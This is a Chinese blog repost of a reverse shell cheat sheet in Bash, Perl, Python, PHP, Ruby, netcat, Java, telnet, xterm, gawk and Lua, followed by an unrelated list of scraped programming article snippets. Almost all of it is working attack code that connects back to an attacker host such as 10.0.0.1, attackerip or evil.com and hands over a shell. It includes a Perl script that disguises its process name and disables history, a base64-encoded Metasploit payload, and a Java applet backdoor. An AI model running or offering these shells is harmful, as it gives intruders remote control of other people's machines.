stonesharp
stonesharp

反弹shell

各种反弹shell的方式 - R00tGrok

时间 2014-04-06 23:27:00   博客园精华区 原文  http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html

[前言:在乌云社区看到反弹shell的几种姿势,考虑到乌云社区不完全对外开放,干脆自己转一下以作分享,另外还收集了点其他的,应该较为全面]

0x01 Bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
这里shell由bash解析,有时候是由sh解析,不一定百发百中

gnucitizen[http://www.gnucitizen.org/blog/reverse-shell-with-bash/]上还有一种不同的方法,评论中也有一些想法:

###$ nc -l -p 8080 -vvv
$ exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done
另外还可以是:
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
/bin/bash  -i > /dev/tcp/attackerip/8080 0<&1 2>&1
0x02 Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

不依赖于/bin/sh的shell:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

系统运行windows时:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

再给出一个完整的Perl的反弹脚本:

 1 #!/usr/bin/perl -w
 2 # perl-reverse-shell - A Reverse Shell implementation in PERL

 3 use strict;
 4 use Socket;
 5 use FileHandle;
 6 use POSIX;
 7 my $VERSION = "1.0";
 8 
 9 # Where to send the reverse shell.  Change these.
10 my $ip = '127.0.0.1';
11 my $port = 1234;
12 
13 # Options
14 my $daemon = 1;
15 my $auth   = 0; # 0 means authentication is disabled and any 
16         # source IP can access the reverse shell
17 my $authorised_client_pattern = qr(^127\.0\.0\.1$);
18 
19 # Declarations
20 my $global_page = "";
21 my $fake_process_name = "/usr/sbin/apache";
22 
23 # Change the process name to be less conspicious
24 $0 = "[httpd]";
25 
26 # Authenticate based on source IP address if required
27 if (defined($ENV{'REMOTE_ADDR'})) {
28     cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
29 
30     if ($auth) {
31         unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
32             cgiprint("ERROR: Your client isn't authorised to view this page");
33             cgiexit();
34         }
35     }
36 } elsif ($auth) {
37     cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
38     cgiexit(0);
39 }
40 
41 # Background and dissociate from parent process if required
42 if ($daemon) {
43     my $pid = fork();
44     if ($pid) {
45         cgiexit(0); # parent exits
46     }
47 
48     setsid();
49     chdir('/');
50     umask(0);
51 }
52 
53 # Make TCP connection for reverse shell
54 socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
55 if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
56     cgiprint("Sent reverse shell to $ip:$port");
57     cgiprintpage();
58 } else {
59     cgiprint("Couldn't open reverse shell to $ip:$port: $!");
60     cgiexit();    
61 }
62 
63 # Redirect STDIN, STDOUT and STDERR to the TCP connection
64 open(STDIN, ">&SOCK");
65 open(STDOUT,">&SOCK");
66 open(STDERR,">&SOCK");
67 $ENV{'HISTFILE'} = '/dev/null';
68 system("w;uname -a;id;pwd");
69 exec({"/bin/sh"} ($fake_process_name, "-i"));
70 
71 # Wrapper around print
72 sub cgiprint {
73     my $line = shift;
74     $line .= "
\n";
75     $global_page .= $line;
76 }
77 
78 # Wrapper around exit
79 sub cgiexit {
80     cgiprintpage();
81     exit 0; # 0 to ensure we don't give a 500 response.
82 }
83 
84 # Form HTTP response using all the messages gathered by cgiprint so far
85 sub cgiprintpage {
86     print "Content-Length: " . length($global_page) . "\r
87 Connection: close\r
88 Content-Type: text\/html\r\n\r\n" . $global_page;
89 }

0x03 Python #测试环境为Linux Python2.7

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

只用一行的形式:#[http://www.r00tsec.com/2011/10/python-one-line-shellcode.html]还有其他一行解决的代码

python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

另外Metasploit版的代码:

msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))

0x04 PHP #代码假设TCP连接的文件描述符为3,如果不行可以试下4,5,6

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

[https://github.com/keshy/cwg_tools/blob/master/php-reverse-shell.php]为一个上传的完整php反弹shell脚本

0x05 Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

不依赖于/bin/sh的shell:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

如果目标系统运行Windows:

ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

当然还有我们很熟悉的MSF模块里面也是有反弹shell的:

#!/usr/bin/env ruby

require 'socket'
require 'open3'

#Set the Remote Host IP
RHOST = "192.168.1.10" 
#Set the Remote Host Port
PORT = "6667"

#Tries to connect every 20 sec until it connects.
begin
sock = TCPSocket.new "#{RHOST}", "#{PORT}"
sock.puts "We are connected!"
rescue
  sleep 20
  retry
end

#Runs the commands you type and sends you back the stdout and stderr.
begin
  while line = sock.gets
    Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
              IO.copy_stream(stdout_and_stderr, sock)
              end  
  end
rescue
  retry
end

0x06 NetCat

nc -e /bin/sh 10.0.0.1 1234  #不同版本的nc不一定支持-e选项

不能使用-e选项时:

mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe
/bin/sh | nc attackerip 4444
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/

安装的NC版本有问题时:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

0x07 Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

msf使用为: use payload/java/shell/reverse_tcp

再见一段长代码:

import java.io.*;
import java.net.Socket;
import java.util.*;
import java.util.regex.*;
import java.applet.Applet;

public class poc extends Applet{
  /**
   * Author: daniel baier alias duddits
   * Licens: GPL
   * Requirements: JRE 1.5 for running and the JDK 1.5 for compiling or higher
   * Version: 0.1 alpha release
   */

  public String cd(String start, File currentDir) {
    File fullPath = new File(currentDir.getAbsolutePath());
    String sparent = fullPath.getAbsoluteFile().toString();
    return sparent + "/" + start;

    }

  @SuppressWarnings("unchecked")
  public void init() {
    poc rs = new poc();
    PrintWriter out;
    try {
      Socket clientSocket = new Socket("192.168.5.222",10003);
      out = new PrintWriter(clientSocket.getOutputStream(), true);
      out.println("\tJRS 0.1 alpha release\n\tdeveloped by duddits alias daniel baier");
      boolean run = true;
      String s;
      BufferedReader br = new BufferedReader(new InputStreamReader(clientSocket.getInputStream()));
      String startort = "/";
      while (run) {
        String z1;
        File f = new File(startort);
        out.println(f.getAbsolutePath() + "> ");
        s = br.readLine();
        z1 = s;
        Pattern pcd = Pattern.compile("^cd\\s");
        Matcher mcd = pcd.matcher(z1);
        String[] teile1 = pcd.split(z1);
        if (s.equals("exit")) {
          run = false;
        }else if (s.equals(null) || s.equals("cmd") || s.equals("")) {

        } else if(mcd.find()){
          try {
            String cds = rs.cd(teile1[1], new File(startort));
            startort = cds;
            } catch (Exception verz) {
            out.println("Path " + teile1[1]
            + " not found.");
            }

        }else {

          String z2;


          z2 = s;
          Pattern pstring = Pattern.compile("\\s");
          String[] plist = pstring.split(z2);

          try {

            LinkedList slist = new LinkedList();
            for (int i = 0; i < plist.length; i++) {
              slist.add(plist[i]);
            }

            ProcessBuilder builder = new ProcessBuilder(slist);
            builder.directory(new File(startort));
            Process p = builder.start();
            Scanner se = new Scanner(p.getInputStream());
            if (!se.hasNext()) {
              Scanner sa = new Scanner(p.getErrorStream());
              while (sa.hasNext()) {
                out.println(sa.nextLine());
              }
            }
            while (se.hasNext()) {
              out.println(se.nextLine());
            }


          } catch (Exception err) {
            out.println(f.getAbsolutePath() + "> Command "
                + s + " failed!");
            out.println(f.getAbsolutePath() +"> Please try cmd /c "+ s+" or bash -c " +s+" if this command is an shell buildin.");
          }

        }
      }

      if(!clientSocket.isConnected()){
        run = false;
        out.flush();
        out.close();
      }

    } catch (Exception io) {
      //System.err.println("Connection refused by peer");
    }

  }

}

0x08 Telnet  #nc不可用或/dev/tcp不可用时

mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe

0x09 Xterm

首先开启Xserver: # TCP 6001

Xnest :1               # Note: The command starts with uppercase X

授予目标机连回来的权限:

xterm -display 127.0.0.1:1          # Run this OUTSIDE the Xnest, another tab
xhost +targetip                         # Run this INSIDE the spawned xterm on the open X Server

如果想让任何人都连上:

xhost +                     # Run this INSIDE the spawned xterm on the open X Server

假设xterm已安装,连回你的Xserver:

xterm -display attackerip:1

或者:

$ DISPLAY=attackerip:0 xterm

0x10 gawk

#!/usr/bin/gawk -f

BEGIN {
  Port    =       8080
  Prompt  =       "bkd> "

  Service = "/inet/tcp/" Port "/0/0"
  while (1) {
    do {
      printf Prompt |& Service
      Service |& getline cmd
      if (cmd) {
        while ((cmd |& getline) > 0)
          print $0 |& Service
        close(cmd)
      }
    } while (cmd != "exit")
    close(Service)
  }
}

0x11 乌云上一个lua实现

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

msf反弹: use payload/cmd/unix/reverse_lua

0x12 参考

http://roo7break.co.uk/?p=215

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

你可能感兴趣的:(杂类)

  • ref 和 reactive 区别 有一个好名字 Vuevue.jsjavascript前端
    前言ref和reactive是Vue3中响应式编程的核心。在Vue中,响应式编程是一种使数据与UI保持同步的方式。当数据变化时,UI会自动更新,反之亦然。这种机制大大简化了前端开发,使我们能够专注于数据和用户界面的交互,而不必手动处理DOM更新。refref是Vue3中的一个简单响应式API,用于创建一个包装基本数据类型的响应式引用(也可以包装复杂类型,只不过底层还是由reactive的方式实现的
  • 软考——简单记忆设计模式 Yeira 设计模式pythonjava
    抽象工厂模式(AbstractFactory):提供一个接口,可以创建一系列相关或相互依赖的对象,而无需指定它们具体的类。(一个接口创建相关对象,无需具体的类)构建器模式(Builder):将一个复杂类的表示与其构造相分离,使得相同的构建过程能够得出不同的表示。(相同是构造,不同的表示)工厂方法模式(FactoryMethod):定义一个创建对象的接口,但由子类决定需要实例化哪一个类。工厂方法使得
  • 第五章 手写ref函数 DT—— 手写Vue3源码javascript前端html
    目录1.ref基本实现2.toRef基本实现3.toRefs基本实现4.proxyRefs基本实现1.ref基本实现ref函数接收一个一个值,如果这个值是基础数据类型,则直接返回一个RefImpl对象,并对这个对象设置属性访问器和属性修改器,在其中进行对应的依赖收集和触发更新如果接受一个复杂类型的数据,则会将数据包装成一个RefImpl对象,并将其value值通过reactive进行代理,最后设置
  • C#中List集合使用Remove方法详解——List使用Remove方法需要注意的坑? 猿享天开 学懂C#-高级编程技术精讲c#开发语言
    目录一、基本使用1、简单类型的例子2、复杂类型的例子二、思考三、深度解析四、正确的使用方式1、重写Equals和GetHashCode2、使用LINQ的FirstOrDefault方法五、性能考虑六、注意事项总结在C#中,List是一个常用的数据结构,它提供了一系列操作方法来管理其内部的元素。Remove方法是其中一个用于移除元素的重要方法。本文将深入探讨List.Remove方法的使用、底层原理
  • 第七章 手写watch 实现 DT—— 手写Vue3源码javascript前端vue.js
    1.创建watch函数在Vue3中,watch是一个函数,这个函数接收三个参数,前两个是必须的参数,第三个是一个配置参数。第一个参数是需要监听的响应式数据,对于复杂类型的数据可以直接传变量本身或者传入一个函数,该函数返回需要监听的数据,如果是简单类型数据,则必须传入一个函数然后函数返回该数据。第二个参数是一个回调函数,该回调函数会在监听数据发生变化后执行,同时该函数会被注入两个参数,第一个参数为变
  • SQLite3 数据类型深入全面讲解 软考鸭 nodejs帮助文档sqlitesqlite数据库
    SQLite3,作为一款轻量级的数据库管理系统,在数据存储方面展现出了其独特的魅力。它不仅支持标准的SQL语法,还提供了丰富的数据类型供开发者选择。这些数据类型不仅涵盖了基本的数值和文本类型,还包括了日期时间、二进制数据等复杂类型。本文将深入全面地讲解SQLite3的数据类型,帮助开发者更好地理解和应用这一强大的数据库工具。一、SQLite3数据类型概述SQLite3的数据类型系统相对简单,但又不
  • vue中ref和reactive Lancelot212 vue.js前端javascript
    ref和reactive是Vue3中用于创建响应式数据的两个重要API,它们之间存在几个关键的区别,主要体现在数据类型、使用方式、访问方式以及设计理念上。1.数据类型不同ref:主要用于定义简单类型的数据(如字符串、数字、布尔值等)以及单一的对象。虽然它可以用于对象,但通常用于需要保持对其值响应式引用的场景。reactive:则主要用于包装JavaScript对象和数组等复杂类型的数据。它能够递归
  • $router.back()携带参数,复杂类型参数和简单类型参数 进阶的巨人001 前端javascriptvue传参beforeRoute
    需求来源:跳转到另外一个页面的时候,$router.back()返回的时候想携带一些参数,然后在返回的页面进行一些操作,虽然可以用vuex或者localstorage这些存储,但始终感觉不太好解决办法:使用beforeRouteEnter进行组件传值上一个页面handleBack(){this.$route.params.id=1//保存的参数this.$router.back();},返回的页面
  • python 接口自动化数据结构(如列表、字典、元组) 测试界晓晓 软件测试python自动化数据结构软件测试自动化测试功能测试程序人生
    在Python接口自动化测试中,数据结构扮演着至关重要的角色,用于组织和处理测试数据、请求参数和响应结果。列表(List)列表是Python中的一种可变序列数据类型,它允许存储一系列有序的、可重复的元素,这些元素可以是任何数据类型,包括字符串、数字、布尔值甚至是其他的列表或字典等复杂类型。users_list=['user1','user2','user3']request_urls=['http
  • 【Rust】004-Rust 所有权 訾博ZiBo Rustrust开发语言后端
    【Rust】004-Rust所有权文章目录【Rust】004-Rust所有权一、预备知识1、堆和栈2、String类型&strString二、所有权规则1、所有权系统的三条规则2、代码示例3、所有权转移简单示例复杂类型的拷贝4、函数的传值与返回三、引用与借用1、借用2、不可变引用(只读)3、可变引用(可读可写)4、重要规则5、NLL6、悬垂引用错误代码四、切片1、概念2、字符串切片基本写法简化写法
  • SpringMVC 八重我老婆 javaspringmavenintellij-ideajvmmybatisjunit
    1.web层-代替Servlet(接收请求、处理请求、做出响应)2.作用做出响应页面跳转-返回字符串-默认转发forward:/xxx/xxxredirect:/xxx/xxx页面跳转-返回ModelAndView页面跳转-使用ServletAPI响应数据-设置响应正文response-流返回字符串+@ResponseBody响应数据-返回JSON返回方法必须是复杂类型@ResponseBody@
  • Spring-06-依赖注入(DI) CodeHuba
    依赖注入(DI)1构造器注入(前面已经说过了)2Set方式注入(重点)依赖注入:Set注入!依赖:bean对象的创建依赖于容器;注入:bean对象的所有属性,由容器来注入;环境搭建复杂类型publicclassAddress{privateStringaddress;publicStringgetAddress(){returnaddress;}publicvoidsetAddress(Strin
  • #Js篇:数组的方法es5和es6 前端xiaolibao Js篇javascript
    数组方法学习判断一个数组的方法Array.isArray()javascript内置的方法,用于检测给定的对象是否为数组类型。早期版本兼容性es5引入,对于不支持es5的老旧浏览器(如ie8及更早版本),该方法不可用。es5实例方法valueof()表示对对象求值。数组的valueOf方法返回数组本身toString()数组的toString方法返回数组的字符串形式----基本类型的数组复杂类型–
  • Watch 在 vue 3 中使用说明 刺客-Andy vue3vue.js前端javascriptvue
    一、监听基础类型constnums=ref(9)watch(nums,(newValue,oldValue)=>{console.log('watch已触发',newValue)})二、监听复杂类型constdemo=reactive({name:'前端小玖',nickName:'小玖',soulmate:{name:'',nickName:''}})复杂类型的监听有很多种情况,具体的内容如下监听
  • Java全栈课程之Spring详解——依赖注入 小孙同学1024 Java全栈开发springjava后端
    一、构造器注入二、set方式注入1.依赖注入:set注入2.依赖:bean对象的创建依赖于容器3.注入;bean对象中的所有属性,有容器来注入4.环境搭建①复杂类型publicclassAddress{privateStringaddress;publicStringgetAddress(){returnaddress;}publicvoidsetAddress(Stringaddress){th
  • C++构造函数/析构函数/复制构造函数(深拷贝/浅拷贝) 时吨吨 C++c++
    目录1.构造函数2.析构函数3.拷贝构造函数4.深拷贝和浅拷贝5.参考内容1.构造函数2.析构函数3.拷贝构造函数4.深拷贝和浅拷贝(1)当我们对复杂类型(结构体或者类)的对象进行初始化时,如果将对象A赋值给同类型的对象B,此时就涉及深拷贝和浅拷贝的问题;(2)如何定义拷贝的深和浅:浅拷贝就是把类/结构体的变量原封不动的赋值,不考虑指针变量;深拷贝就是在赋值时会对指针变量做处理;总结:对象拷贝时,
  • 字符串比较大小c语言指针详解经典非常详细,C语言指针详解(经典,非常详细) DreamBSD
    前言:复杂类型说明要了解指针,多多少少会出现一些比较复杂的类型,所以我先介绍一下如何完全理解一个复杂类型,要理解复杂类型其实很简单,一个类型里会出现很多运算符,他们也像普通的表达式一样,有优先级,其优先级和运算优先级一样,所以我总结了一下其原则:从变量名处起,根据运算符优先级结合,一步一步分析.下面让我们先从简单的类型开始慢慢分析吧:intp;//这是一个普通的整型变量int*p;//首先从P处开
  • 【Flink】FlinkSQL的DataGen连接器(测试利器) 一杯咖啡半杯糖 Flink实战flink大数据
    简介我们在实际开发过程中可以使用FlinkSQL的DataGen连接器实现FlinkSQL的批或者流模拟数据生成,DataGen连接器允许按数据生成规则进行读取,但注意:DataGen连接器不支持复杂类型:Array,Map,Row。请用计算列构造这些类型创建有界DataGen表CREATETABLEtest(aINT,bSTRING,createtimeTIMESTAMP(3),WATERMAR
  • 江醉心
    工作了,助理,帮别人忙人家的私人小时,打杂类~时间花费很多,赚钱的效率一般。自己确感觉没有了自己思想的时间,回来都是游戏度过~浪费时间。只有去保持健身房的频率,很少读书了,也很少听书了~进步的空间,想像的空间狭窄了。把游戏卸载了,看看我下班后自己的时间如何分配,想睡久点久点~终究还是不成熟,害怕的样子也许这是新的路子,也许这是新的开始,现在都不知道未来会成为什么样子。继续做吧,在没有自己坚定之前。
  • C语言基础07——结构体 蛋翼 C语言c语言开发语言
    目录结构体类型的声明与初始化结构体的声明结构体变量的定义和初始化结构体成员的访问结构体传参练习结构体类型的声明与初始化结构体的声明结构体使C语言有能力描述复杂类型。结构体是一种集合,它里面可以包含多个变量或数组,它们的类型可以相同,也可以不同,这些变量或数组都称为结构体的成员(Member)。结构体也是一种数据类型,它由程序员自己定义,可以包含多个其他类型的数据。像int、float、char等是
  • C语言指针你弄明白了吗 呼啦啦的爱
    C语言指针说难不难但是说容易又是最容易出错的地方,因此不管是你要做什么只要用到C指针你就跳不过,今天咱们就以十九个例子来给大家简单的分析一下指针的应用,最后会有C语言视频资料提供给大家更加深入的参考。进入今天的主题,要了解指针,多多少少会出现一些比较复杂的类型,所以我先介绍一下如何完全理解一个复杂类型,要理解复杂类型其实很简单,一个类型里会出现很多运算符,他们也像普通的表达式一样,有优先级,其优先
  • C# 浅克隆与深克隆 wangnaisheng C#c#
    在C#中,浅克隆(ShallowClone)和深克隆(DeepClone)是两种常见的对象克隆技术,用于创建对象的新副本。它们的主要区别在于复制对象的层次和属性的处理方式。浅克隆(ShallowCopy)当进行浅克隆时,一个新的对象实例被创建,原始对象的所有字段(成员变量)的值都被复制到新对象中。但是,如果这些字段包含引用类型(如类、数组或其他复杂类型),那么复制的是引用而不是引用的对象内容本身。
  • JavaScript对象----内置对象常用方法及案例 美貌与智慧并存的妞 JavaScript
    目录jQuery对象为什么要有对象什么是对象JavaScript中的对象对象字面量对象创建方式属性和方法new关键字this详解对象的使用遍历对象的属性删除对象的属性简单类型和复杂类型的区别内置对象MDN如何学习一个方法?Math对象Date对象Array对象基本包装类型String对象jQuery对象为什么要有对象functionprintPerson(name,age,sex....){}//
  • Spring Bean 依赖注入常见错误(下) xiaoshitou_2015 springjava后端
    在实际应用中,我们也会使用@Value等不太常见的注解来完成自动注入,同时也存在注入到集合、数组等复杂类型的场景。这些情况下,我们也会遇到一些问题。所以这一讲我们不妨来梳理下。案例1:@Value没有注入预期的值在装配对象成员属性时,我们常常会使用@Autowired来装配。但是,有时候我们也使用@Value进行装配。不过这两种注解使用风格不同,使用@Autowired一般都不会设置属性值,而@V
  • TS系列之typeof 菜鸡爱上编程 TS前端javascripttypescript
    TS系列之typeof这里写目录标题前言回顾:Js中typeof的用法1、typeof的返回类型有哪些Ts中的typeof运算符作为类型判断的工具什么是typeof?类型保护与条件类型复杂类型总结前言今天总结一下typeof相关的知识。typeof在Js中也是常用来判断变量类型的关键字,那么在Ts中的作用又是什么,下面一起来看看。回顾:Js中typeof的用法1、typeof的返回类型有哪些“un
  • mysql hive 数据类型_Hive数据类型 王火龙果 mysqlhive数据类型
    本章介绍Hive不同的数据类型,用于创建表。Hive所有数据类型分为四种类型,给出如下:列类型文字Null值复杂类型列类型列类型被用作Hive的列数据类型。它们如下:整型整型数据可以指定使用整型数据类型,INT。当数据范围超过INT的范围,需要使用BIGINT,如果数据范围比INT小,使用SMALLINT。TINYINT比SMALLINT小。下表描述了各种INT数据类型:类型后缀示例TINYINT
  • hive 数据类型 java_Hive - 数据类型 本本纲目 hive数据类型java
    本章将带您了解Hive中涉及表创建的不同数据类型。Hive中的所有数据类型分为四种类型,具体如下:列类型字面空值复杂类型列类型列类型用作Hive的列数据类型。他们如下:积分类型整型数据可以使用整型数据类型INT来指定。当数据范围超出INT范围时,需要使用BIGINT,如果数据范围小于INT,则使用SMALLINT。TINYINT比SMALLINT小。下表描述了各种INT数据类型:类型后缀例TINY
  • ༺༽༾ཊ—设计-原-06-型-模式—ཏ༿༼༻ __water 1024程序员节c#设计模式
    名称:原型模式类型:创建型目的:当有多个抽象角色时使用的一种工厂模式。抽象工厂模式可以向客户端提供一个接口,使客户端在不必指定产品的具体情况下,创建多个产品族中的产品对象,总体来说:对复杂创建类型进行自我复制,常与建造者模式结合使用优点:1.具体产品在应用层的代码隔离无需关系创建的细节2.将一个系列的产品统一到一起创建两种方式可以实现克隆,实现,解析:通过对(孙悟空类)复杂类的自我复制拓展功能解决
  • JavaScript隐式转换 LBJ辉 JavaScriptjavascript前端
    你所忽略的js隐式转换1、js数据类型js中有7种数据类型,可以分为两类:原始类型、对象类型:基础类型(原始值):undefined、null、String、Number、Boolean、Symbol(es6新出的,本文不讨论这种类型)复杂类型(对象值):object2、三种隐式转换类型js中一个难点就是js隐形转换,因为js在一些操作符下其类型会做一些变化,所以js灵活,同时造成易出错,并且难以
  • JS-数组相关 Turbosaa JavaScriptjavascript前端
    文章目录数组介绍创建数组数组特性数组塌陷数组介绍数组是js中的一种复杂类型数据array一组有序数据的列表私人解释:可以装载有序数据的“盒子”数组中可以存储多个任意类型的数据注意:一般一个数组中存储的数据类型都是一致的创建数组字面量创建语法:变量=[]得到一个空数组语法:变量=[数据,数据,数据...]得到一个有数据的数组数组中每个数据之间通过逗号分隔注意:逗号之间没有数据则会产生空数据empty
  • 矩阵求逆(JAVA)利用伴随矩阵 qiuwanchi 利用伴随矩阵求逆矩阵
    package gaodai.matrix; import gaodai.determinant.DeterminantCalculation; import java.util.ArrayList; import java.util.List; import java.util.Scanner; /** * 矩阵求逆(利用伴随矩阵) * @author 邱万迟
  • 单例(Singleton)模式 aoyouzi 单例模式Singleton
    3.1           概述 如果要保证系统里一个类最多只能存在一个实例时,我们就需要单例模式。这种情况在我们应用中经常碰到,例如缓存池,数据库连接池,线程池,一些应用服务实例等。在多线程环境中,为了保证实例的唯一性其实并不简单,这章将和读者一起探讨如何实现单例模式。 3.2
  • [开源与自主研发]就算可以轻易获得外部技术支持,自己也必须研发 comsci 开源
          现在国内有大量的信息技术产品,都是通过盗版,免费下载,开源,附送等方式从国外的开发者那里获得的。。。。。。        虽然这种情况带来了国内信息产业的短暂繁荣,也促进了电子商务和互联网产业的快速发展,但是实际上,我们应该清醒的看到,这些产业的核心力量是被国外的
  • 页面有两个frame,怎样点击一个的链接改变另一个的内容 Array_06 UIXHTML
    <a src="地址"  targets="这里写你要操作的Frame的名字" />搜索 然后你点击连接以后你的新页面就会显示在你设置的Frame名字的框那里 targerts="",就是你要填写目标的显示页面位置 ===================== 例如: <frame src=&
  • Struts2实现单个/多个文件上传和下载 oloz 文件上传struts
    struts2单文件上传:     步骤01:jsp页面 <!--在进行文件上传时,表单提交方式一定要是post的方式,因为文件上传时二进制文件可能会很大,还有就是enctype属性,这个属性一定要写成multipart/form-data,不然就会以二进制文本上传到服务器端-->   <form action="fileUplo
  • 推荐10个在线logo设计网站 362217990 logo
    在线设计Logo网站。 1、http://flickr.nosv.org(这个太简单) 2、http://www.logomaker.com/?source=1.5770.1 3、http://www.simwebsol.com/ImageTool 4、http://www.logogenerator.com/logo.php?nal=1&tpl_catlist[]=2 5、ht
  • jsp上传文件 香水浓 jspfileupload
    1. jsp上传 Notice: 1. form表单 method 属性必须设置为 POST 方法 ,不能使用 GET 方法 2. form表单 enctype 属性需要设置为 multipart/form-data 3. form表单 action 属性需要设置为提交到后台处理文件上传的jsp文件地址或者servlet地址。例如 uploadFile.jsp 程序文件用来处理上传的文
  • 我的架构经验系列文章 - 前端架构 agevs JavaScriptWeb框架UIjQuer
    框架层面:近几年前端发展很快,前端之所以叫前端因为前端是已经可以独立成为一种职业了,js也不再是十年前的玩具了,以前富客户端RIA的应用可能会用flash/flex或是silverlight,现在可以使用js来完成大部分的功能,因此js作为一门前端的支撑语言也不仅仅是进行的简单的编码,越来越多框架性的东西出现了。越来越多的开发模式转变为后端只是吐json的数据源,而前端做所有UI的事情。MVCMV
  • android ksoap2 中把XML(DataSet) 当做参数传递 aijuans android
    我的android app中需要发送webservice ,于是我使用了 ksop2 进行发送,在测试过程中不是很顺利,不能正常工作.我的web service 请求格式如下     [html]  view plain copy   <Envelope xmlns="http://schemas.
  • 使用Spring进行统一日志管理 + 统一异常管理 baalwolf spring
    统一日志和异常管理配置好后,SSH项目中,代码以往散落的log.info() 和 try..catch..finally 再也不见踪影! 统一日志异常实现类: [java]  view plain copy   package com.pilelot.web.util;      impor
  • Android SDK 国内镜像 BigBird2012 android sdk
    一、镜像地址: 1、东软信息学院的 Android SDK 镜像,比配置代理下载快多了。 配置地址, http://mirrors.neusoft.edu.cn/configurations.we#android 2、北京化工大学的: IPV4:ubuntu.buct.edu.cn  IPV4:ubuntu.buct.cn IPV6:ubuntu.buct6.edu.cn
  • HTML无害化和Sanitize模块 bijian1013 JavaScriptAngularJSLinkySanitize
    一.ng-bind-html、ng-bind-html-unsafe         AngularJS非常注重安全方面的问题,它会尽一切可能把大多数攻击手段最小化。其中一个攻击手段是向你的web页面里注入不安全的HTML,然后利用它触发跨站攻击或者注入攻击。         考虑这样一个例子,假设我们有一个变量存
  • [Maven学习笔记二]Maven命令 bit1129 maven
    mvn compile compile编译命令将src/main/java和src/main/resources中的代码和配置文件编译到target/classes中,不会对src/test/java中的测试类进行编译 MVN编译使用 maven-resources-plugin:2.6:resources maven-compiler-plugin:2.5.1:compile &nbs
  • 【Java命令二】jhat bit1129 Java命令
    jhat用于分析使用jmap dump的文件,,可以将堆中的对象以html的形式显示出来,包括对象的数量,大小等等,并支持对象查询语言。 jhat默认开启监听端口7000的HTTP服务,jhat是Java Heap Analysis Tool的缩写 1. 用法: [hadoop@hadoop bin]$ jhat -help Usage: jhat [-stack <bool&g
  • JBoss 5.1.0 GA:Error installing to Instantiated: name=AttachmentStore state=Desc ronin47
    进到类似目录 server/default/conf/bootstrap,打开文件 profile.xml找到: Xml代码<bean    name="AttachmentStore"  class="org.jboss.system.server.profileservice.repository.AbstractAtta
  • 写给初学者的6条网页设计安全配色指南 brotherlamp UIui自学ui视频ui教程ui资料
    网页设计中最基本的原则之一是,不管你花多长时间创造一个华丽的设计,其最终的角色都是这场秀中真正的明星——内容的衬托     我仍然清楚地记得我最早的一次美术课,那时我还是一个小小的、对凡事都充满渴望的孩子,我摆放出一大堆漂亮的彩色颜料。我仍然记得当我第一次看到原色与另一种颜色混合变成第二种颜色时的那种兴奋,并且我想,既然两种颜色能创造出一种全新的美丽色彩,那所有颜色
  • 有一个数组,每次从中间随机取一个,然后放回去,当所有的元素都被取过,返回总共的取的次数。写一个函数实现。复杂度是什么。 bylijinnan java算法面试
